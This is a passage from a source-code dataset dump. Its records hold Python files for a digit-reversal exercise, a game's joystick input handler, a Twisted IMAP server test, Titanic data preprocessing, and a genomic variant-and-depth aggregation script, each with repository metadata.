ce4f4de3c6cd53f78a77f8f7d171a222a593ea7e | 4a28e3e3afb28c0455ea21cfb983c3a8284dc5dd | /Reverse.py | bc387ecd0eea4a1c2e6fe9318772782e900f4b58 | [] | no_license | omdeshmukh20/Python-3-Programming | 60f6bc4e627de9d643a429e64878a636f3875cae | 9fb4c7fa54bc26d18b69141493c7a72e0f68f7d0 | refs/heads/main | 2023-08-28T04:37:27.001888 | 2021-10-29T17:03:34 | 2021-10-29T17:03:34 | 370,008,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | #Discription: Accept Number From User And Return Reverse Of That Number Using For-Loop
#Date: 14/08/21
#Author : Om Deshmukh
# Reverse Operation
def Reverse(iValue1):
iDigit = 0
iRev = 0
if iValue1 < 0:
exit("Invalid Input! | Note : Give Input Greater Than 0")
for _ in range(iValue1):
if iValue1 == 0:
break
iDigit = iValue1 % 10
iRev = (iRev * 10) + iDigit
iValue1 = iValue1 // 10
return iRev
# Entry Point
def main():
iNo1 = int(input("Enter The Number : "))
iRet = Reverse(iNo1)
print("Reverse Number is : ", iRet)
# Code Starter
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
4497e161d8e06316103a36d717fe15e66be3c951 | 3b504a983f1807ae7c5af51078bfab8c187fc82d | /client/input/InputSubsystem/JoyInput.py | 03a21fda604012c74ea881e2b4fdb3fcfdc8f167 | [] | no_license | SEA-group/wowp_scripts | 7d35fd213db95ea6b3dbd1ec6d3e0f13de86ba58 | 2fe54a44df34f2dcaa6860a23b835dcd8dd21402 | refs/heads/master | 2021-09-07T23:10:13.706605 | 2018-03-02T17:23:48 | 2018-03-02T17:23:48 | 117,280,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,816 | py | # Embedded file name: scripts/client/input/InputSubsystem/JoyInput.py
import Keys
import BWPersonality
import InputMapping
import math
from MathExt import *
from consts import ROLL_AXIS, VERTICAL_AXIS, HORIZONTAL_AXIS, FORCE_AXIS, FLAPS_AXIS, INPUT_SYSTEM_STATE
from input.InputSubsystem.InputSubsystemBase import InputSubsystemBase
import GameEnvironment
BASE_SMOOTH_WINDOW = 10
class ProxyCamStrategy(object):
@staticmethod
def rotateCursor(*args):
pass
class JoystickExpertInput(InputSubsystemBase):
def __init__(self, profile):
self._profile = profile
self.__isRawForceAxis = True
self.__smoothStack = {}
self.__lastSmoothWin = {}
class JoyEvent:
def __init__(self):
self.deviceId = None
self.axis = None
self.value = None
return
self.__joyEvent = JoyEvent()
def pushLastEvent(self):
for deviceId in BWPersonality.axis:
for axis in BWPersonality.axis[deviceId]:
self.__joyEvent.deviceId = deviceId
self.__joyEvent.axis = axis
self.__joyEvent.value = BWPersonality.axis[deviceId][axis]
self.processJoystickEvent(self.__joyEvent)
def restart(self):
self.__smoothStack = {}
self.__lastSmoothWin = {}
def dispose(self):
self._profile = None
return
@property
def __cameraStrategy(self):
cam = GameEnvironment.getCamera()
if cam is not None:
return cam.getDefualtStrategies['CameraStrategyNormal']
else:
return ProxyCamStrategy
def processJoystickEvent(self, event):
jSet = InputMapping.g_instance.joystickSettings
rValue = 0.0
vValue = 0.0
hValue = 0.0
fValue = 0.0
if event.axis == jSet.ROLL_AXIS and (event.deviceId == jSet.ROLL_DEVICE or 0 == jSet.ROLL_DEVICE):
rValue = -event.value if jSet.INVERT_ROLL else event.value
rawValue = rValue
if abs(rValue) <= jSet.ROLL_DEAD_ZONE:
self._profile.sendData(ROLL_AXIS, 0.0, -rawValue)
else:
rValue = self.__signalSmoothing(jSet.ROLL_AXIS, rValue, jSet.ROLL_SMOOTH_WINDOW)
rValue = self.__signalDiscrete(jSet.ROLL_SENSITIVITY, rValue, event.deviceId, event.axis)
rValue = math.copysign((abs(rValue) - jSet.ROLL_DEAD_ZONE) / (1.0 - jSet.ROLL_DEAD_ZONE), rValue)
rValue = InputMapping.translateAxisValue(jSet.AXIS_X_CURVE, rValue)
rValue = clamp(-1.0, -rValue, 1.0)
self._profile.sendData(ROLL_AXIS, rValue, -rawValue)
elif event.axis == jSet.VERTICAL_AXIS and (event.deviceId == jSet.VERTICAL_DEVICE or 0 == jSet.VERTICAL_DEVICE):
vValue = -event.value if jSet.INVERT_VERTICAL else event.value
rawValue = vValue
if abs(vValue) <= jSet.VERTICAL_DEAD_ZONE:
self._profile.sendData(VERTICAL_AXIS, 0.0, rawValue)
else:
vValue = self.__signalSmoothing(jSet.VERTICAL_AXIS, vValue, jSet.VERTICAL_SMOOTH_WINDOW)
vValue = self.__signalDiscrete(jSet.VERTICAL_SENSITIVITY, vValue, event.deviceId, event.axis)
vValue = math.copysign((abs(vValue) - jSet.VERTICAL_DEAD_ZONE) / (1 - jSet.VERTICAL_DEAD_ZONE), vValue)
vValue = InputMapping.translateAxisValue(jSet.AXIS_Y_CURVE, vValue)
vValue = clamp(-1.0, -vValue, 1.0)
self._profile.sendData(VERTICAL_AXIS, vValue, -rawValue)
elif event.axis == jSet.HORIZONTAL_AXIS and (event.deviceId == jSet.HORIZONTAL_DEVICE or 0 == jSet.HORIZONTAL_DEVICE):
hValue = event.value if jSet.INVERT_HORIZONTAL else -event.value
rawValue = hValue
if abs(hValue) <= jSet.HORIZONTAL_DEAD_ZONE:
self._profile.sendData(HORIZONTAL_AXIS, 0.0, rawValue)
else:
hValue = self.__signalSmoothing(jSet.HORIZONTAL_AXIS, hValue, jSet.HORIZONTAL_SMOOTH_WINDOW)
hValue = self.__signalDiscrete(jSet.HORIZONTAL_SENSITIVITY, hValue, event.deviceId, event.axis)
hValue = InputMapping.translateAxisValue(jSet.AXIS_Z_CURVE, hValue)
hValue = math.copysign((abs(hValue) - jSet.HORIZONTAL_DEAD_ZONE) / (1 - jSet.HORIZONTAL_DEAD_ZONE), hValue)
if InputMapping.g_instance.currentProfileType == INPUT_SYSTEM_STATE.GAMEPAD_DIRECT_CONTROL:
hValue *= -1
hValue = clamp(-1.0, hValue, 1.0)
self._profile.sendData(HORIZONTAL_AXIS, hValue, rawValue)
elif event.axis == jSet.FORCE_AXIS and (event.deviceId == jSet.FORCE_DEVICE or 0 == jSet.FORCE_DEVICE):
fValue = -event.value if jSet.INVERT_FORCE else event.value
rawValue = fValue
if self.__isRawForceAxis:
fValue = self.__renormalization(fValue)
self._profile.sendData(FORCE_AXIS, fValue, rawValue)
self.__cameraStrategy.rotateCursor(vValue * 0.01, hValue * 0.01)
def setCursorCamera(self, isCursorCamera):
pass
def setRawForceAxis(self, value):
self.__isRawForceAxis = value
def __renormalization(self, x):
maxForce = InputMapping.g_instance.joystickSettings.POINT_OF_NORMAL_THRUST
deadZone = InputMapping.g_instance.joystickSettings.FORCE_DEAD_ZONE
if deadZone > 1:
deadZone = 1
if x > deadZone:
return 1
if maxForce < x <= deadZone:
return 0
return clamp(-1.0, (x + 1.0) / (max(-0.99, maxForce) + 1.0) - 1.0, 0.0)
def __signalDiscrete(self, discrete, value, deviceId, axis):
SENSITIVITY = 14 * discrete
joyDPI = BigWorld.getJoystickResolution(deviceId, axis) / pow(2.0, math.floor(SENSITIVITY))
halfSingleSignal = 0.5 / joyDPI
if abs(value) < 0.25 * halfSingleSignal or abs(value) > 1.0 - 0.25 * halfSingleSignal:
return value
absValue = math.floor(abs(value) * joyDPI) / joyDPI + halfSingleSignal
return math.copysign(absValue, value)
def __signalSmoothing(self, axis, value, win, e = 0.99):
if self.__lastSmoothWin.get(axis, None) != win:
self.__lastSmoothWin[axis] = win
if self.__smoothStack.get(axis, None):
self.__smoothStack[axis] = []
window = max(int(BASE_SMOOTH_WINDOW * win), 1)
self.__smoothStack.setdefault(axis, []).append(value)
if len(self.__smoothStack[axis]) > window:
self.__smoothStack[axis].pop(0)
val = math.copysign(1.0, value) if abs(value) >= e else sum(self.__smoothStack[axis]) / len(self.__smoothStack[axis])
return val | [
"[email protected]"
] | |
6259b00f99bd0193a97019a733fdc7d17fd4e74b | 916773e4af7367022067abf2e92bc8ab7302b1e5 | /trunk/prodRoot/desktopApp/test/imap/imapServer.py | 270d663e89626782dde57cc0a1ac2653dc86f92d | [] | no_license | weijia/ufs | 814ac76a9a44a931803971cb4edcefd79c87d807 | c43cdae2dfe89b747b6970138ccdf9ddf7f766b3 | refs/heads/master | 2016-09-01T18:35:33.754862 | 2012-08-14T09:02:40 | 2012-08-14T09:02:40 | 3,439,945 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,361 | py | from twisted.mail import imap4, maildir
from twisted.internet import reactor, defer, protocol
from twisted.cred import portal, checkers, credentials
from twisted.cred import error as credError
from twisted.python import filepath
from zope.interface import implements
import time, os, random, pickle
MAILBOXDELIMITER = "."
class IMAPUserAccount(object):
implements(imap4.IAccount)
def __init__(self, userDir):
self.dir = userDir
self.mailboxCache = {}
# make sure Inbox exists
inbox = self._getMailbox("Inbox", create=True)
def listMailboxes(self, ref, wildcard):
for box in os.listdir(self.dir):
yield box, self._getMailbox(box)
def select(self, path, rw=True):
"return an object implementing IMailbox for the given path"
return self._getMailbox(path)
def _getMailbox(self, path, create=False):
"""
Helper function to get a mailbox object at the given
path, optionally creating it if it doesn't already exist.
"""
# According to the IMAP spec, Inbox is case-insensitive
pathParts = path.split(MAILBOXDELIMITER)
if pathParts[0].lower() == 'inbox': pathParts[0] = 'Inbox'
path = MAILBOXDELIMITER.join(pathParts)
if not self.mailboxCache.has_key(path):
fullPath = os.path.join(self.dir, path)
if not os.path.exists(fullPath):
if create:
maildir.initializeMaildir(fullPath)
else:
raise KeyError, "No such mailbox"
self.mailboxCache[path] = IMAPMailbox(fullPath)
return self.mailboxCache[path]
def create(self, path):
"create a mailbox at path and return it"
self._getMailbox(path, create=True)
def delete(self, path):
"delete the mailbox at path"
raise imap4.MailboxException("Permission denied.")
def rename(self, oldname, newname):
"rename a mailbox"
oldPath = os.path.join(self.dir, oldname)
newPath = os.path.join(self.dir, newname)
os.rename(oldPath, newPath)
def isSubscribed(self, path):
"return a true value if user is subscribed to the mailbox"
return self._getMailbox(path).metadata.get('subscribed', False)
def subscribe(self, path):
"mark a mailbox as subscribed"
box = self._getMailbox(path)
box.metadata['subscribed'] = True
box.saveMetadata()
return True
def unsubscribe(self, path):
"mark a mailbox as unsubscribed"
box = self._getMailbox(path)
box.metadata['subscribed'] = False
box.saveMetadata()
return True
class ExtendedMaildir(maildir.MaildirMailbox):
"""
Extends maildir.MaildirMailbox to expose more
of the underlying filename data
"""
def __iter__(self):
"iterates through the full paths of all messages in the maildir"
return iter(self.list)
def __len__(self):
return len(self.list)
def __getitem__(self, i):
return self.list[i]
def deleteMessage(self, filename):
index = self.list.index(filename)
os.remove(filename)
del(self.list[index])
class IMAPMailbox(object):
implements(imap4.IMailbox)
def __init__(self, path):
self.maildir = ExtendedMaildir(path)
self.metadataFile = os.path.join(path, '.imap-metadata.pickle')
if os.path.exists(self.metadataFile):
self.metadata = pickle.load(file(self.metadataFile, 'r+b'))
else:
self.metadata = {}
self.initMetadata()
self.listeners = []
self._assignUIDs()
def initMetadata(self):
if not self.metadata.has_key('flags'):
self.metadata['flags'] = {} # dict of message IDs to flags
if not self.metadata.has_key('uidvalidity'):
# create a unique integer ID to identify this version of
# the mailbox, so the client could tell if it was deleted
# and replaced by a different mailbox with the same name
self.metadata['uidvalidity'] = random.randint(1000000, 9999999)
if not self.metadata.has_key('uids'):
self.metadata['uids'] = {}
if not self.metadata.has_key('uidnext'):
self.metadata['uidnext'] = 1 # next UID to be assigned
def saveMetadata(self):
pickle.dump(self.metadata, file(self.metadataFile, 'w+b'))
def _assignUIDs(self):
# make sure every message has a uid
for messagePath in self.maildir:
messageFile = os.path.basename(messagePath)
if not self.metadata['uids'].has_key(messageFile):
self.metadata['uids'][messageFile] = self.metadata['uidnext']
self.metadata['uidnext'] += 1
self.saveMetadata()
def getHierarchicalDelimiter(self):
return MAILBOXDELIMITER
def getFlags(self):
"return list of flags supported by this mailbox"
return [r'\Seen', r'\Unseen', r'\Deleted',
r'\Flagged', r'\Answered', r'\Recent']
def getMessageCount(self):
return len(self.maildir)
def getRecentCount(self):
return 0
def getUnseenCount(self):
def messageIsUnseen(filename):
filename = os.path.basename(filename)
uid = self.metadata['uids'].get(filename)
flags = self.metadata['flags'].get(uid, [])
if not r'\Seen' in flags:
return True
return len(filter(messageIsUnseen, self.maildir))
def isWriteable(self):
return True
def getUIDValidity(self):
return self.metadata['uidvalidity']
def getUID(self, messageNum):
filename = os.path.basename(self.maildir[messageNum-1])
return self.metadata['uids'][filename]
def getUIDNext(self):
return self.folder.metadata['uidnext']
def _uidMessageSetToSeqDict(self, messageSet):
"""
take a MessageSet object containing UIDs, and return
a dictionary mapping sequence numbers to filenames
"""
# if messageSet.last is None, it means 'the end', and needs to
# be set to a sane high number before attempting to iterate
# through the MessageSet
if not messageSet.last:
messageSet.last = self.metadata['uidnext']
allUIDs = []
for filename in self.maildir:
shortFilename = os.path.basename(filename)
allUIDs.append(self.metadata['uids'][shortFilename])
allUIDs.sort()
seqMap = {}
for uid in messageSet:
# the message set covers a span of UIDs. not all of them
# will necessarily exist, so check each one for validity
if uid in allUIDs:
sequence = allUIDs.index(uid)+1
seqMap[sequence] = self.maildir[sequence-1]
return seqMap
def _seqMessageSetToSeqDict(self, messageSet):
"""
take a MessageSet object containing message sequence numbers,
and return a dictionary mapping sequence number to filenames
"""
# if messageSet.last is None, it means 'the end', and needs to
# be set to a sane high number before attempting to iterate
# through the MessageSet
if not messageSet.last: messageSet.last = len(self.maildir)-1
seqMap = {}
for messageNo in messageSet:
seqMap[messageNo] = self.maildir[messageNo-1]
return seqMap
def fetch(self, messages, uid):
if uid:
messagesToFetch = self._uidMessageSetToSeqDict(messages)
else:
messagesToFetch = self._seqMessageSetToSeqDict(messages)
for seq, filename in messagesToFetch.items():
uid = self.getUID(seq)
flags = self.metadata['flags'].get(uid, [])
yield seq, MaildirMessage(file(filename).read(), uid, flags)
def addListener(self, listener):
self.listeners.append(listener)
return True
def removeListener(self, listener):
self.listeners.remove(listener)
return True
def requestStatus(self, path):
return imap4.statusRequestHelper(self, path)
def addMessage(self, msg, flags=None, date=None):
if flags is None: flags = []
return self.maildir.appendMessage(msg).addCallback(
self._addedMessage, flags)
def _addedMessage(self, _, flags):
# the first argument is the value returned from
# MaildirMailbox.appendMessage. It doesn't contain any meaningful
# information and can be discarded. Using the name "_" is a Twisted
# idiom for unimportant return values.
self._assignUIDs()
messageFile = os.path.basename(self.maildir[-1])
messageID = self.metadata['uids'][messageFile]
self.metadata['flags'][messageID] = flags
self.saveMetadata()
def store(self, messageSet, flags, mode, uid):
if uid:
messages = self._uidMessageSetToSeqDict(messageSet)
else:
messages = self._seqMessageSetToSeqDict(messageSet)
setFlags = {}
for seq, filename in messages.items():
uid = self.getUID(seq)
if mode == 0: # replace flags
messageFlags = self.metadata['flags'][uid] = flags
else:
messageFlags = self.metadata['flags'].setdefault(uid, [])
for flag in flags:
# mode 1 is append, mode -1 is delete
if mode == 1 and not messageFlags.count(flag):
messageFlags.append(flag)
elif mode == -1 and messageFlags.count(flag):
messageFlags.remove(flag)
setFlags[seq] = messageFlags
self.saveMetadata()
return setFlags
def expunge(self):
"remove all messages marked for deletion"
removed = []
for filename in self.maildir:
uid = self.metadata['uids'].get(os.path.basename(filename))
if r"\Deleted" in self.metadata['flags'].get(uid, []):
self.maildir.deleteMessage(filename)
# you could also throw away the metadata here
removed.append(uid)
return removed
def destroy(self):
"complete remove the mailbox and all its contents"
raise imap4.MailboxException("Permission denied.")
from cStringIO import StringIO
import email
class MaildirMessagePart(object):
implements(imap4.IMessagePart)
def __init__(self, mimeMessage):
self.message = mimeMessage
self.data = str(self.message)
def getHeaders(self, negate, *names):
"""
Return a dict mapping header name to header value. If *names
is empty, match all headers; if negate is true, return only
headers _not_ listed in *names.
"""
if not names: names = self.message.keys()
headers = {}
if negate:
for header in self.message.keys():
if header.upper() not in names:
headers[header.lower()] = self.message.get(header, '')
else:
for name in names:
headers[name.lower()] = self.message.get(name, '')
return headers
def getBodyFile(self):
"return a file-like object containing this message's body"
bodyData = str(self.message.get_payload())
return StringIO(bodyData)
def getSize(self):
return len(self.data)
def getInternalDate(self):
return self.message.get('Date', '')
def isMultipart(self):
return self.message.is_multipart()
def getSubPart(self, partNo):
return MaildirMessagePart(self.message.get_payload(partNo))
class MaildirMessage(MaildirMessagePart):
implements(imap4.IMessage)
def __init__(self, messageData, uid, flags):
self.data = messageData
self.message = email.message_from_string(self.data)
self.uid = uid
self.flags = flags
def getUID(self):
return self.uid
def getFlags(self):
return self.flags
class MailUserRealm(object):
implements(portal.IRealm)
avatarInterfaces = {
imap4.IAccount: IMAPUserAccount,
}
def __init__(self, baseDir):
self.baseDir = baseDir
def requestAvatar(self, avatarId, mind, *interfaces):
for requestedInterface in interfaces:
if self.avatarInterfaces.has_key(requestedInterface):
# make sure the user dir exists (avatarId is username)
userDir = os.path.join(self.baseDir, avatarId)
if not os.path.exists(userDir):
os.mkdir(userDir)
# return an instance of the correct class
avatarClass = self.avatarInterfaces[requestedInterface]
avatar = avatarClass(userDir)
# null logout function: take no arguments and do nothing
logout = lambda: None
return defer.succeed((requestedInterface, avatar, logout))
# none of the requested interfaces was supported
raise KeyError("None of the requested interfaces is supported")
def passwordFileToDict(filename):
passwords = {}
for line in file(filename):
if line and line.count(':'):
username, password = line.strip().split(':')
passwords[username] = password
return passwords
class CredentialsChecker(object):
implements(checkers.ICredentialsChecker)
credentialInterfaces = (credentials.IUsernamePassword,
credentials.IUsernameHashedPassword)
def __init__(self, passwords):
"passwords: a dict-like object mapping usernames to passwords"
self.passwords = passwords
def requestAvatarId(self, credentials):
"""
check to see if the supplied credentials authenticate.
if so, return an 'avatar id', in this case the name of
the IMAP user.
The supplied credentials will implement one of the classes
in self.credentialInterfaces. In this case both
IUsernamePassword and IUsernameHashedPassword have a
checkPassword method that takes the real password and checks
it against the supplied password.
"""
username = credentials.username
if self.passwords.has_key(username):
realPassword = self.passwords[username]
checking = defer.maybeDeferred(
credentials.checkPassword, realPassword)
# pass result of checkPassword, and the username that was
# being authenticated, to self._checkedPassword
checking.addCallback(self._checkedPassword, username)
return checking
else:
raise credError.UnauthorizedLogin("No such user")
def _checkedPassword(self, matched, username):
if matched:
# password was correct
return username
else:
raise credError.UnauthorizedLogin("Bad password")
class IMAPServerProtocol(imap4.IMAP4Server):
"Subclass of imap4.IMAP4Server that adds debugging."
debug = True
def lineReceived(self, line):
if self.debug:
print "CLIENT:", line
imap4.IMAP4Server.lineReceived(self, line)
def sendLine(self, line):
imap4.IMAP4Server.sendLine(self, line)
if self.debug:
print "SERVER:", line
class IMAPFactory(protocol.Factory):
protocol = IMAPServerProtocol
portal = None # placeholder
def buildProtocol(self, address):
p = self.protocol()
p.portal = self.portal
p.factory = self
return p
if __name__ == "__main__":
import sys
dataDir = sys.argv[1]
portal = portal.Portal(MailUserRealm(dataDir))
passwordFile = os.path.join(dataDir, 'passwords.txt')
passwords = passwordFileToDict(passwordFile)
passwordChecker = CredentialsChecker(passwords)
portal.registerChecker(passwordChecker)
factory = IMAPFactory()
factory.portal = portal
reactor.listenTCP(143, factory)
reactor.run() | [
"[email protected]"
] | |
f817dc9cd7b0ee5cb3fb0d8da067107e84fabd08 | c380976b7c59dadaccabacf6b541124c967d2b5a | /.history/src/data/data_20191021130626.py | 54a8374208393201a7d3ecf5fa63dc428630f047 | [
"MIT"
] | permissive | bkraft4257/kaggle_titanic | b83603563b4a3c995b631e8142fe72e1730a0e2e | f29ea1773773109a867278c001dbd21a9f7b21dd | refs/heads/master | 2020-08-17T12:45:28.653402 | 2019-11-15T16:20:04 | 2019-11-15T16:20:04 | 215,667,760 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,770 | py | import pandas as pd
import numpy as np
from typing import Union
from pathlib import Path
from nameparser import HumanName
class ExtractData:
def __init__(self, filename: Union[str, Path], age_bins = None, drop_columns=None):
# """Extract Training Data from file or Path
# Arguments:
# filename {[str]} -- Filename of CSV data file containing data.
# drop_columns -- Columns in dataframe that should be dropped.
# """
if drop_columns is None:
drop_columns = ["age", "cabin", "name", "ticket"]
self.filename = filename
self.drop_columns = drop_columns
self.all_label_columns = ["survived"]
self.all_feature_columns = [
"pclass",
"name",
"sex",
"age",
"sibsp",
"parch",
"ticket",
"fare",
"cabin",
"embarked",
]
self.Xy_raw = None
self.extract_raw()
def extract_raw(self):
"""
Extracts data from a CSV file.
Returns:
pd.DataFrame -- [description]
"""
Xy_raw = pd.read_csv(self.filename)
Xy_raw.columns = Xy_raw.columns.str.lower().str.replace(" ", "_")
Xy_raw = Xy_raw.rename(columns={"age": "age_known"})
Xy_raw["pclass"] = Xy_raw["pclass"].astype("category")
self.Xy_raw = Xy_raw.set_index("passengerid")
class TransformData:
title_translator = {
"Mlle.": "Mrs.",
"Mme.": "Mrs.",
"Sir.": "Mr.",
"Ms.": "Mrs.",
"Rev.": "Mr.",
"": "Mr.",
"Col.": "Mr.",
"Capt.": "Mr.",
"Lady.": "Mrs.",
"the Countess. of": "Mrs.",
}
def __init__(
self,
raw_data,
adult_age_threshold_min=13,
age_bins = None,
Xy_age_estimate=None,
drop_columns=None,
):
# """Extract Training Data from file or Path
# Arguments:
# filename {[str]} -- Filename of CSV data file containing data.
# drop_columns -- Columns in dataframe that should be dropped.
# """
if age_bins is None:
age_bins = [0,10,20,30, 40, 50, 60, np.inf]
if drop_columns is None:
drop_columns = ["age", "cabin", "name", "ticket"]
self.raw = raw_data
self.adult_age_threshold_min = adult_age_threshold_min
self.Xy_age_estimate = Xy_age_estimate
self.age_bins = age_bins
self.Xy = self.raw.Xy_raw.copy()
self.extract_title()
self.extract_last_name()
self.extract_cabin_number()
self.extract_cabin_prefix()
self.estimate_age()
self.calc_is_child()
self.calc_is_travelling_alone()
def calc_is_travelling_alone(self):
self.Xy["is_travelling_alone"] = (self.Xy.sibsp == 0) & (self.Xy.parch == 0)
def calc_is_child(self):
self.Xy["is_child"] = self.Xy.age < self.adult_age_threshold_min
def extract_cabin_number(self):
self.Xy["cabin_number"] = self.Xy.ticket.str.extract("(\d+)$")
def extract_cabin_prefix(self):
self.Xy["cabin_prefix"] = self.Xy.ticket.str.extract("^(.+) ")
def extract_title(self):
"""[summary]
"""
self.Xy["title"] = (
self.Xy.name.apply(lambda x: HumanName(x).title)
.replace(self.title_translator)
.replace({"\.": ""}, regex=True)
)
def extract_last_name(self):
self.Xy["last_name"] = self.Xy.name.apply(lambda x: HumanName(x).last)
def calc_age_bins(self):
self.Xy['age_bin'] = pd.cut(Xy.age, bins=[0,10,20,30, 40, 50, 60, np.inf])
def clean(self,):
"""Clean data to remove missing data and "unnecessary" features.
Arguments:
in_raw_df {pd.DataFrame} -- Dataframe containing all columns and rows Kaggle Titanic Training Data set
"""
self.Xy = self.Xy_raw.drop(self.drop_columns, axis=1)
def estimate_age(self, groupby_columns=["sex", "title"]):
"""[summary]
Keyword Arguments:
groupby {list} -- [description] (default: {['sex','title']})
"""
if self.Xy_age_estimate is None:
Xy_age_estimate = (
self.Xy.groupby(groupby_columns).age_known.mean().to_frame().round(1)
)
Xy_age_estimate = Xy_age_estimate.rename(
columns={"age_known": "age_estimate"}
)
out_df = self.Xy.reset_index().merge(Xy_age_estimate, on=groupby_columns)
out_df["age"] = out_df["age_known"].fillna(out_df["age_estimate"])
self.Xy = out_df
self.Xy_age_estimate = Xy_age_estimate
| [
"[email protected]"
] | |
c42757ed648fb8b964c0e0ab2fa9c6969b1b2058 | cc4c8bec896c2d0a6ac4c1f0e01f73d8157f891a | /util/__deprecated.aggregate_variants_n_depth_to_table.py | 9819ed136498e9b69c83b545a2d93ff6258dd946 | [] | no_license | NCIP/ctat-mutations-benchmarking | fe6a79007d6a22e4301b130a55f982d835b57691 | 1a8fe28860c3d216ba0acfe888b300dc3235c79a | refs/heads/main | 2023-05-29T21:00:57.730494 | 2021-05-12T17:53:20 | 2021-05-12T17:53:20 | 366,363,093 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,110 | py | #!/usr/bin/env python
import os,sys,argparse
import subprocess
import numpy as np
import pandas as pd
import re
import pickle
import csv
csv.field_size_limit(100000000)
def configure_vcf(vcf, column_name, chr_idx=0, coord_idx=1, refallele_idx=3, varallele_idx=4):
'''
Configure the vcf file to prepare for merging with other data
'''
print('Loading {} VCF: {}'.format(column_name, vcf))
df = pd.read_csv(vcf, sep='\t', header=None, comment='#',engine='python')
## Remove "chr" if in front of chromosome number
df.loc[:,chr_idx] = df.loc[:,chr_idx].map(str)
df.loc[:,chr_idx] = df.loc[:,0].map(lambda x: x.lstrip('chr'))
df=df.replace({chr_idx: {"X":"23","Y":"24","MT":"25","M":"25"}})
df["CHROMPOS"] = df.iloc[:,chr_idx] + ':' +df.iloc[:,coord_idx].map(str)
## set column name to SNP ref:alt
df[column_name] = df.iloc[:,refallele_idx].map(str) + ':' +df.iloc[:,varallele_idx].map(str)
## use column names from the VCF format.
df.rename(columns={chr_idx:'CHROM',coord_idx:'POS', refallele_idx:'REF', varallele_idx:'VAR'}, inplace=True)
print(df.head())
return df
def add_variant_attribute_from_vcf(df, vcf_filename, column_name, **kwargs):
# check for pickle file and load
pickle_path = os.path.basename(vcf_filename) + ".pickle"
print(pickle_path)
var_attribute_df = None
if (os.path.exists(pickle_path)):
print('Loading Pickle: {}'.format(pickle_path))
inPickle = open(pickle_path,'rb')
var_attribute_df = pickle.load(inPickle)
inPickle.close()
# if not found, read and create the pickle
else:
print('Creating Pickle: {}'.format(pickle_path))
var_attribute_df = configure_vcf(vcf_filename, column_name, **kwargs)
outPickle = open(pickle_path, 'wb')
pickle.dump(var_attribute_df, outPickle)
outPickle.close()
var_attribute_df = var_attribute_df[['CHROMPOS', column_name]]
df = pd.merge(df, var_attribute_df, how='left', on='CHROMPOS')
# Check
print(df.head())
return df
def check_if_chr_bam(filename):
cmd = 'samtools idxstats '+ filename +'| cut -f1'
output = (subprocess.check_output(cmd, shell=True))
print(output)
m_chr = re.findall(r'Y\\n(.*)\\n', str(output))[0].split('\\n')[0] ## seems brittle... //TODO: more rigorous way?
chr_prefix_flag = 'chr' in str(output)
print('****',chr_prefix_flag, m_chr)
return chr_prefix_flag, m_chr
def add_depth_info(df, bam_filename, column_name):
print(df.head())
#########################################################################
# Create a bed file of SNP locations, used to extract coverage depth info.
########################################################################
df_bed = df[['CHROM', 'POS']].copy()
df_bed.columns = ['Chr', 'Pos'] # using different ones for the bed
print(df_bed.head())
df_bed['Pos'] = df_bed['Pos'].map(int) # store positions as integers.
df_bed['Pos-1'] = (df_bed['Pos']-1)
## Check if "chr" in front of chromosome name in the bam file
chr_prefix_flag, m_chr_pred = check_if_chr_bam(bam_filename)
if chr_prefix_flag:
df_bed['Chr'] = 'chr' + df_bed['Chr'].map(str) # add chr at the beginning of chr names
# back-convert X,Y,M from numeric vals used earlier
df_bed['Chr'] = df_bed.loc[:,'Chr'].replace('23','X') #replace chr23 with chrX
df_bed['Chr'] = df_bed.loc[:,'Chr'].replace('24','Y') #replace chr24 with chrY
df_bed['Chr'] = df_bed.loc[:,'Chr'].replace('25', m_chr_pred) #replace chr25 with chrM
# sort by chr, pos
df_bed = df_bed.sort_values(['Chr', 'Pos'], ascending=[True, True])
# make bed file containing target sites for depth calc
bed_filename = os.path.basename(bam_filename) + ".{}_count.variants_pos.bed".format(len(df_bed))
if os.path.exists(bed_filename):
print("-reusing bed file: {}".format(bed_filename))
else:
df_bed.to_csv(bed_filename, sep ='\t', index=False, header=False, na_rep='NA', columns=['Chr', 'Pos-1', 'Pos'])
print('Bed File created: {}'.format(bed_filename))
# make depth file
depth_filename = bed_filename + ".depth"
if os.path.exists(depth_filename):
print("-reusing depth file: {}".format(depth_filename))
else:
cmd = "samtools depth -b {} {} > {}".format(bed_filename, bam_filename, depth_filename)
subprocess.check_call(cmd, shell=True)
print("Depth file created: {}".format(depth_filename))
# Merge depth values with SNP values
df_depth = pd.read_csv(depth_filename, sep='\t', header=None, low_memory=False)
if chr_prefix_flag:
df_depth.loc[:,0] = df_depth.loc[:,0].map(lambda x: x.lstrip('chr'))
df_depth=df_depth.replace({0: {"X":"23", "Y":"24", "MT":"25", "M":"25"} })
df_depth["CHROMPOS"] = df_depth.iloc[:,0].map(str) + ':' +df_depth.iloc[:,1].map(str)
df_depth[column_name] = df_depth.iloc[:,2]
## simplify to just the 2 columns we want
df_depth = df_depth[['CHROMPOS',column_name]]
## merge into the original data frame
df = pd.merge(df, df_depth, how='left', on='CHROMPOS')
return df
def restrict_regions(input_vcf_file, restrict_regions_bed_file):
restricted_vcf_file = input_vcf_file + ".restricted.vcf"
cmd = "bcftools filter -T {} {} -o {}".format(restrict_regions_bed_file, input_vcf_file, restricted_vcf_file)
subprocess.check_call(cmd, shell=True)
return restricted_vcf_file
def main():
## Input arguments
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, description = "Convert vcf file to benchmarking input file\n")
parser.add_argument('--pred_vcf', required = True, dest = 'pred_vcf', help="input prediction vcf")
parser.add_argument('--truth_vcf', required = True, help="reference truth set vcf")
parser.add_argument('--pred_bam', required = True , dest = 'bam_file', help="Alignment file of reads with the reference")
parser.add_argument('--out', required = True , dest = 'out_file', help="Output filename")
parser.add_argument('--exome_bam', help="Alignment file of the exome with the reference")
parser.add_argument("--restrict_regions_bed", help="bed file containing regions to restrict analysis to. (ie. high confidence regions)")
## filtering options.
parser.add_argument('--dbsnp', dest = 'dbsnp', help="input dbsnp file")
parser.add_argument('--rnaediting', dest = 'rnaediting', help="input rnaediting file")
parser.add_argument('--cosmic', dest = 'cosmic', help="input cosmic file")
args = parser.parse_args()
pred_vcf = args.pred_vcf
truth_vcf = args.truth_vcf
